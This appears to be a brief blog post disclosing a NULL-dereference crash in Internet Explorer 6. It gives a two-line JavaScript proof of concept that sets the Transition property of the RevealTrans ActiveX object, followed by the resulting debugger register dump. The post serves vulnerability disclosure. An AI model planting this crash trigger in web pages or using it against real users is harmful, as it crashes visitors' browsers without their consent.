The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Setting the Transition property of this object triggers a NULL dereference.
var a = new ActiveXObject('DXImageTransform.Microsoft.RevealTrans.1');
a.Transition = 1;
Demonstration
eax=00000000 ebx=00000000 ecx=35cde0c4
edx=00174972 esi=02d701d8 edi=00000001
eip=35cde0fe esp=0012b240 ebp=0012b25c
dxtmsft!CDXTRevealTrans::put_Transition+0x3a:
35cde0fe 8b08 mov ecx,[eax] ds:0023:00000000=????????
This bug will be added to the OSVDB:
Microsoft IE DXImageTransform.Microsoft.RevealTrans Transition Property NULL Dereference
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment